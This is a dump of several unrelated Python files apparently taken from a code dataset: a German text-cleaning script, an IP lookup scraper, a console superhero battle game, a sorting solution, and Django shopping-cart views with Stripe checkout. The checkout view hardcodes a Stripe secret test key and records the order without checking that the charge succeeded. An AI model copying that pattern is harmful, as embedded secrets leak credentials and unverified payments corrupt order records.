2010),\r\n valid_split=StaticSpliter(2013, 2017, 1, 2003, 2013),\r\n ta = ta, n_pool=1)\r\n confer.syms = confer.syms[0:1]\r\n return confer\r\n\r\nif __name__ == '__main__':\r\n confer = getConf()\r\n build.work(confer)\r\n model.work(confer)\r\n pred.work(confer)\r\n","sub_path":"run/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"238005559","text":"import codecs, nltk, string\r\nfrom nltk.corpus import stopwords\r\nimport csv\r\n\r\nfrom nltk.stem import SnowballStemmer\r\nsnowball_stemmer = SnowballStemmer(\"german\")\r\n\r\ndataset = codecs.open(\"presse/cdu/cdu.tsv\", \"r\", \"utf-8\").read().strip().split(\"\\n\")\r\n\r\nfrom nltk.stem.wordnet import WordNetLemmatizer\r\n\r\nwordnet_lemmatizer = WordNetLemmatizer()\r\n\r\nexclude = set(string.punctuation)\r\nstop_word_list = stopwords.words('german')\r\n\r\n# input should be a string\r\ndef nlp_pipeline(text):\r\n # if you want you can split in sentences - i'm usually skipping this step\r\n # text = nltk.sent_tokenize(text)\r\n\r\n # tokenize 
words for each sentence\r\n    text = nltk.word_tokenize(text)\r\n\r\n    # pos tagger\r\n    text = nltk.pos_tag(text)\r\n\r\n    # lemmatizer\r\n    text = [\r\n        wordnet_lemmatizer.lemmatize(token.lower(), \"v\") if \"V\" in pos else wordnet_lemmatizer.lemmatize(token.lower())\r\n        for token, pos in text]\r\n\r\n    # remove punctuation and numbers\r\n    text = [token for token in text if token not in exclude and token.isalpha()]\r\n\r\n    # remove stopwords - be careful with this step\r\n    text = \" \".join([token for token in text if token not in stop_word_list])\r\n\r\n    return text\r\n\r\n\r\ncorpus = []\r\n\r\noutput = codecs.open(\"presse/cdu/cdu_final.tsv\",\"w\",\"utf-8\")\r\n\r\n# be careful with this, the dataset is huge!\r\nfor line in dataset:\r\n    #print line\r\n    article = line.split(\"\\t\")[2]\r\n\r\n    text = nlp_pipeline(article)\r\n\r\n    text = text.replace(\"\\t\", \" \")\r\n    #print text\r\n\r\n    output.write(line + \"\\t\" + text + \"\\n\")\r\n\r\noutput.close()","sub_path":"resources/cdu/cleaning_cdu.py","file_name":"cleaning_cdu.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"616390983","text":"import requests\nfrom lxml import etree\nimport os\n\ndef get_ip():\n    payload = {'key1': 'value1', 'key2': 'value2'}\n\n    r = requests.get(url='https://www.ipip.net',data=payload)\n    html=etree.HTML(r.text)\n    ip=html.xpath('//*[@id=\"ip\"]/text()')\n    print(ip)\n\nget_ip()","sub_path":"wol/whatsmyip.py","file_name":"whatsmyip.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"486608911","text":"import random\n\nclass Hero:\n    def __init__(self, name, health = 100):\n        # Initialize starting values\n        self.abilities = list()\n        self.name = name\n        self.armors = list()\n        self.start_health = health\n        self.health = health\n        self.deaths = 0\n        self.kills = 0\n\n    def defend(self):\n        \"\"\"\n        This method should run the defend method on each piece of armor and calculate the total defense.\n        If the hero's health is 0, the hero is out of play and should return 0 defense points.\n        \"\"\"\n        total_defense = 0\n        for armor in self.armors:\n            total_defense += armor.defend()\n        if self.health == 0:\n            total_defense = 0\n        return total_defense\n\n    def take_damage(self, damage_amt):\n        \"\"\"\n        This method should subtract the damage amount from the hero's health.\n\n        If the hero dies update number of deaths.\n        \"\"\"\n        self.health = self.health - damage_amt\n        if self.health <= 0:\n            self.deaths += 1\n\n    def add_kill(self, num_kills):\n        \"\"\"\n        This method should add the number of kills to self.kills\n        \"\"\"\n        self.kills += num_kills\n\n\n    def add_ability(self, ability):\n        # Add ability to abilities list\n        self.abilities.append(ability)\n\n    def add_armor(self, armor):\n        self.armors.append(armor)\n\n    def attack(self):\n        # sum the attack value of every ability this hero has\n        total_attack = 0\n        if self.abilities is not None:\n            for ability in self.abilities:\n                total_attack += ability.attack()\n        return total_attack\n\nclass Ability:\n    def __init__(self, name, attack_strength): # Initialize starting values\n        # Set Ability name\n        self.name = name\n        # Set attack strength\n        self.attack_strength = attack_strength\n\n    def attack(self): # Return attack value\n        # Calculate lowest attack value as an integer\n        lowest_attack_value = 
self.attack_strength // 2\n        # Use random.randint(a, b) to select a random attack value.\n        attack_strength = random.randint(lowest_attack_value, self.attack_strength)\n        # Return attack value between the lowest value and the full attack\n        return attack_strength\n\n    def update_attack(self, attack_strength): # Update attack value\n        self.attack_strength = attack_strength\n\nclass Weapon(Ability):\n    def attack(self):\n        \"\"\"\n        This method should return a random value between 0\n        and the full attack power of the weapon.\n        Hint: The attack power is inherited.\n        \"\"\"\n\n        return random.randint(0, self.attack_strength)\n\nclass Armor:\n    def __init__(self, name, defense):\n        \"\"\"Instantiate name and defense strength. \"\"\"\n        self.name = name\n        self.defense = defense\n\n    def defend(self):\n        \"\"\"\n        Return a random value between 0 and the\n        initialized defend strength.\n        \"\"\"\n        return random.randint(0, self.defense)\n\nclass Team:\n    def __init__(self, team_name):\n        \"\"\"Instantiate resources.\"\"\"\n        self.name = team_name\n        self.heroes = list()\n        self.team_kills = 0\n        self.team_health = 0\n\n    def add_hero(self, Hero):\n        \"\"\"Add Hero object to heroes list.\"\"\"\n        self.heroes.append(Hero)\n        self.team_health += Hero.health\n\n    def remove_hero(self, name):\n        \"\"\"\n        Remove hero from heroes list.\n        If Hero isn't found return 0.\n        \"\"\"\n\n        if self.heroes is not None:\n            for hero in self.heroes:\n                if name in hero.name:\n                    self.heroes.remove(hero)\n                    return hero\n        # hero was not found (or the list is empty)\n        return 0\n\n    def attack(self, other_team):\n        \"\"\"\n        This method should total our teams attack strength and call the defend() method on the rival team that is passed in.\n        It should call add_kill() on each hero with the number of kills made.\n        \"\"\"\n        total_attack = 0\n        for hero in self.heroes:\n            total_attack += hero.attack()\n\n        other_team_defense = other_team.defend(total_attack)\n        for hero in self.heroes:\n            hero.add_kill(other_team_defense)\n\n    def defend(self, damage_amt):\n        \"\"\"\n        This method should calculate our team's total defense.\n        Any damage in excess of our team's total defense should be evenly distributed amongst all heroes with the deal_damage() method.\n\n        Return number of heroes killed in attack.\n        \"\"\"\n        total_defense = 0\n        for hero in self.heroes:\n            total_defense += hero.defend()\n        excess_damage = damage_amt - total_defense\n\n        if excess_damage > 0:\n            self.team_health -= excess_damage\n            return self.deal_damage(excess_damage)\n        else:\n            return 0\n\n    def deal_damage(self, damage):\n        \"\"\"\n        Divide the total damage amongst all heroes.\n        Return the number of heroes that died in attack.\n        \"\"\"\n        total_damage = damage // len(self.heroes)\n        total_deaths = 0\n        for hero in self.heroes:\n            hero.take_damage(total_damage)\n            if hero.health <= 0:\n                total_deaths += 1\n        return total_deaths\n\n    def revive_heroes(self, health = 100):\n        \"\"\"\n        This method should reset all heroes health to their original starting value.\n        \"\"\"\n        self.team_health = 0\n        for hero in self.heroes:\n            hero.health = hero.start_health\n            self.team_health += hero.health\n\n    def stats(self):\n        \"\"\"\n        This method should print the ratio of kills/deaths for each member of the team to the screen.\n\n        This data must be output to the terminal.\n        \"\"\"\n        for hero in self.heroes:\n            print(hero.name + \" Kills: \" + str(hero.kills) + \" Deaths: \" + str(hero.deaths))\n\n    def update_kills(self):\n        \"\"\"\n        This method should update each hero when there is a team kill.\n        \"\"\"\n        for hero in self.heroes:\n            if hero.kills > 0:\n                print(hero.name + \" has killed a member of the 
other team!\")\n\n\n    def find_hero(self, name):\n        \"\"\"\n        Find and return hero from heroes list.\n        If Hero isn't found return 0.\n        \"\"\"\n\n        if self.heroes is not None:\n            for hero in self.heroes:\n                if name == hero.name:\n                    return hero\n        # hero was not found (or the list is empty)\n        return 0\n\n    def view_all_heroes(self):\n        \"\"\"Print out all heroes to the console.\"\"\"\n        for hero in self.heroes:\n            print(hero.name)\n\nclass Arena:\n    def __init__(self, team_size=1):\n\n        self.team_one = None\n        self.team_two = None\n        self.team_size = team_size\n\n\n\n    def build_team_one(self):\n        \"\"\"\n        This method should allow a user to build team one.\n        \"\"\"\n        self.team_one = Team(input(\"Please name the first team: \"))\n        print(\"It's time to play! Both teams have \" + str(self.team_size) + \" players\")\n        for i in range(self.team_size):\n            print(\"Hero number {}. \".format(i))\n            self.team_one.add_hero(create_hero())\n\n    def build_team_two(self):\n        \"\"\"\n        This method should allow user to build team two.\n        \"\"\"\n        self.team_two = Team(input(\"Please name the second team: \"))\n        print(\"It's time to play! Both teams have \" + str(self.team_size) + \" players\")\n        for i in range(self.team_size):\n            print(\"Hero number {}. \".format(i))\n            self.team_two.add_hero(create_hero())\n\n    def team_battle(self):\n        \"\"\"\n        This method should continue to battle teams until one or both teams are dead.\n        \"\"\"\n        while(self.team_one.team_health > 0 and self.team_two.team_health > 0):\n            self.team_one.attack(self.team_two)\n            self.team_two.attack(self.team_one)\n        self.show_stats()\n        # the team that still has health left wins the battle\n        if(self.team_one.team_health <= 0):\n            return self.team_two.name\n        return self.team_one.name\n\n\n    def show_stats(self):\n        \"\"\"\n        This method should print out the battle statistics\n        including each heroes kill/death ratio.\n        \"\"\"\n        self.team_one.stats()\n        self.team_two.stats()\n\ndef create_hero():\n    hero = Hero(input(\"Please name your hero: \"))\n\n    print(\"Please give your hero abilities: \")\n    i = None\n    while i != \"done\":\n        hero.add_ability(create_ability())\n        i = input(\"Add more abilities? Press enter to keep adding or type 'done' to finish adding abilities. \").lower()\n\n    print(\"Please give your hero weapons: \")\n    i = None\n    while i != \"done\":\n        hero.add_ability(create_weapon())\n        i = input(\"Add more weapons? Press enter to keep adding or type 'done' to finish adding weapons. \").lower()\n\n    print(\"Please give your hero armor: \")\n    i = None\n    while i != \"done\":\n        hero.add_armor(create_armor())\n        i = input(\"Add more armor? Press enter to keep adding or type 'done' to finish adding armor. \").lower()\n    print(\"Your hero is ready!! It's time to play!\")\n    return hero\n\ndef create_ability():\n    ability = Ability(input(\"What is the name of the ability? \"), int(input(\"What is the strength level of the ability? \")))\n    return ability\n\ndef create_weapon():\n    weapon = Weapon(input(\"What is the name of the weapon? \"), int(input(\"What is the strength level of the weapon? \")))\n    return weapon\n\ndef create_armor():\n    armor = Armor(input(\"What is the name of the armor? \"), int(input(\"What is the strength level of the armor? 
\")))\n return armor\n\n\n\nif __name__ == \"__main__\":\n game_is_running = True\n\n # Instantiate Game Arena\n arena = Arena()\n\n #Build Teams\n arena.build_team_one()\n arena.build_team_two()\n\n while game_is_running:\n\n arena.team_battle()\n arena.show_stats()\n play_again = input(\"Play Again? Y or N: \")\n\n #Check for Player Input\n if play_again.lower() == \"n\":\n game_is_running = False\n\n else:\n #Revive heroes to play again\n arena.team_one.revive_heroes()\n arena.team_two.revive_heroes()\n\n# if __name__ == \"__main__\":\n# battle_zone = Arena(int(input(\"What is the size of your team?: \")))\n# running = True\n# battle_zone.build_team_one()\n# battle_zone.build_team_two()\n# while(running):\n# print(battle_zone.team_battle())\n# i = input(\"Would you like to play again? (yes/no): \")\n# if( i == \"no\"):\n# running = False\n# else:\n# battle_zone.team_one.revive_heroes()\n# print(battle_zone.team_one.heroes[0].health)\n# battle_zone.team_two.revive_heroes()\n\n# if __name__ == \"__main__\":\n# hero = Hero(\"Super Man\")\n# print(hero.attack())\n# ability = Ability(\"Laser Eyes\", 600)\n# hero.add_ability(ability)\n# print(hero.attack())\n# new_ability = Ability(\"Super Strength\", 1000)\n# hero.add_ability(new_ability)\n# print(hero.attack())\n","sub_path":"super-heroes.py","file_name":"super-heroes.py","file_ext":"py","file_size_in_byte":11414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"633588257","text":"import sys; readl = sys.stdin.readline\n\nn = int(readl())\nexists = [False for _ in range(2000001)]\nfor _ in range(n):\n num = int(readl())\n exists[1000000 + num] = True\n \n\nfor i in reversed(range(2000001)):\n if exists[i]:\n print(i -1000000)\n","sub_path":"Python/BOJ/정렬/11931.py","file_name":"11931.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"31526834","text":"from django.shortcuts import render\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom prod_cat_app.models import Products , Category\nfrom .models import Cart ,ShippingAddresses , My_order\nfrom cart.forms import Billing_address_form\nfrom django.views.generic import ListView\nfrom django.views.generic.edit import CreateView\nfrom django.db.models import Sum\nfrom django.views import View\nfrom django.http import HttpResponseRedirect\nimport stripe\nimport datetime\nimport random\n# Create your views here.\n\nclass CartHome(ListView):\n template_name = 'cart.html'\n context_object_name = 'cart_detail'\n def get_queryset(self):\n cart_id = self.request.session.get('cart_id',None)\n cart_obj = Cart.objects.get(id=cart_id)\n print(cart_obj.product.all())\n return cart_obj.product.all()\n def get_context_data(self, **kwargs):# we need to add more data from this view that is why I', using get_context_data\n context = super().get_context_data()\n cart_id = self.request.session.get('cart_id',None)\n cart_obj = Cart.objects.get(id=cart_id)\n #print(self.request.session)\n context['context'] = Category.objects.all()\n context['total'] = cart_obj.product.all().aggregate(Sum('price'))\n return context\n\n\ndef cartadd(request,product_name):\n cart_id = request.session.get('cart_id',None)\n prod_obj = Products.objects.get(name=product_name)\n print('this is product object',prod_obj)\n cart_obj = Cart.objects.get(id=cart_id)\n cart_obj.product.add(prod_obj.id)\n total = cart_obj.product.aggregate(Sum('price'))\n print('the total is 
',total)\n    cart_obj.total = total['price__sum']\n    cart_obj.save()\n    return redirect('cart:cart')\n\ndef cart_del_item(request, product_id):\n    if request.method == 'POST':\n        cart_id = Cart.objects.get(id=request.session.get('cart_id', None))\n        product_obj = Products.objects.get(id=product_id)\n        product_obj.cart_set.remove(cart_id)\n        return redirect('cart:cart')\n    else:\n        return redirect('cart:cart')\n####### how to add the user after authentication to the shipping address model?????\nclass Checkout(View):\n    def get(self,request):\n        if request.user.is_authenticated:\n            sh_obj = ShippingAddresses.objects.filter(user__email=request.user)\n            form = Billing_address_form(initial={'fullname':request.user.firstname + ' ' +request.user.lastname ,\n                                                 'email':request.user.email})\n            return render(request,'checkout.html',{'form':form})\n        else:\n            return redirect('/loginpage/'+'?next=shippingaddress')\n\n\n\n##### still need to make sure the payment is successful #####\n    def post(self,request):\n        stripe.api_key = \"sk_test_Ln325yMLJM96doz28lnlxAIx00vQplbcK4\"\n        cart_obj = Cart.objects.get(id=request.session.get('cart_id', None))\n        form = Billing_address_form(request.POST)\n        print('is the form valid:', form.is_valid())\n        if form.is_valid():\n            shipping_address = ShippingAddresses(user=request.user,cart=cart_obj,\n                                                 city=form.cleaned_data['city'],\n                                                 area=form.cleaned_data['area'],\n                                                 address_line=form.cleaned_data['address_line'],\n                                                 Pobox=form.cleaned_data['Pobox'])\n            shipping_address.save()\n            token = request.POST['stripeToken']\n            charge = stripe.Charge.create(\n                amount=int(cart_obj.total),\n                currency='usd',\n                description='Purchase Order',\n                source=token,)\n            My_order_obj = My_order(user=request.user, cart=cart_obj, shipping_details=shipping_address,\n                                    order_id=random.randint(10000,99999),\n                                    order_date=datetime.datetime.now(),order_status=False)\n            My_order_obj.save()\n            return render(request,'order.html',{'order_id':My_order_obj.order_id})\n        else:\n            return HttpResponseRedirect('/home/')\n","sub_path":"walladver/cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}